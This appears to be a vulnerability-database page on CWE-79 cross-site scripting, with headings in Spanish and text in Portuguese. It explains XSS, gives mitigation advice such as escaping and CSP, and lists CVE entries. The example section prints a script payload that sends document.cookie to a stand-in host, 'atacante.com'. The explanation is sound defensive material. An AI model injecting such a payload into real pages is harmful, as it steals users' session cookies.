Fallos del tipo CWE-79

28.654 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2021-32962HIGHClaroty Secure Remote Access Site - Authentication Bypass Using an Alternate Path or ChannelEPSS 0.8%CVE-2020-7481—A CWE-79:Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability exists Andover Continuum (All veEPSS 0.8%CVE-2024-4023HIGHStored XSS in flatpressblog/flatpressEPSS 0.8%CVE-2021-36713MEDIUMCross Site Scripting (XSS) vulnerability in the DataTables plug-in 1.9.2 for jQuery allows attackers to run arbitrary code via the sBaseNameEPSS 0.8%CVE-2021-24338—Pods < 2.7.27 - Authenticated Stored Cross-Site Scripting (XSS)EPSS 0.8%CVE-2022-24873MEDIUMNon-Stored Cross-site Scripting in Shopware storefrontEPSS 0.8%CVE-2021-32793MEDIUMStored XSS Vulnerability in the Pi-hole WebinterfaceEPSS 0.8%CVE-2024-52520MEDIUMNextcloud Server's link reference provider can be tricked into downloading bigger files than intendedEPSS 0.8%CVE-2022-2113HIGHCross-site Scripting (XSS) - Stored in inventree/inventreeEPSS 0.8%CVE-2020-14333MEDIUMA flaw was found in Ovirt Engine's web interface in ovirt 4.4 and earlier, where it did not filter user-controllable parameters completely, EPSS 0.8%CVE-2026-65605CRITICALSiYuan before v3.7.2 Stored XSS to RCE via Attribute ViewEPSS 0.8%CVE-2022-1928MEDIUMCross-site Scripting (XSS) - Stored in go-gitea/giteaEPSS 0.8%CVE-2021-3983MEDIUMCross-site Scripting (XSS) - Stored in kevinpapst/kimai2EPSS 0.8%CVE-2018-0208—A vulnerability in the web-based management interface of the (cloud based) Cisco Registered Envelope Service could allow an authenticated, rEPSS 0.8%CVE-2026-65606CRITICALSiYuan before v3.7.2 Cross-Site Scripting to RCEEPSS 0.8%CVE-2021-3863MEDIUMCross-site Scripting (XSS) - Generic in snipe/snipe-itEPSS 0.8%CVE-2022-24869MEDIUMCross Site Scripting in GLPIEPSS 0.8%CVE-2023-1912HIGHLimit Login Attempts <= 1.7.1 - Unauthenticated Stored Cross-Site ScriptingEPSS 0.8%CVE-2020-2503CRITICALStored cross-site scripting vulnerability in QESEPSS 0.8%CVE-2024-39024HIGHIn Packetfence 13.2.0, the WebGui interface setting allows authenticated remote code execution.EPSS 0.8%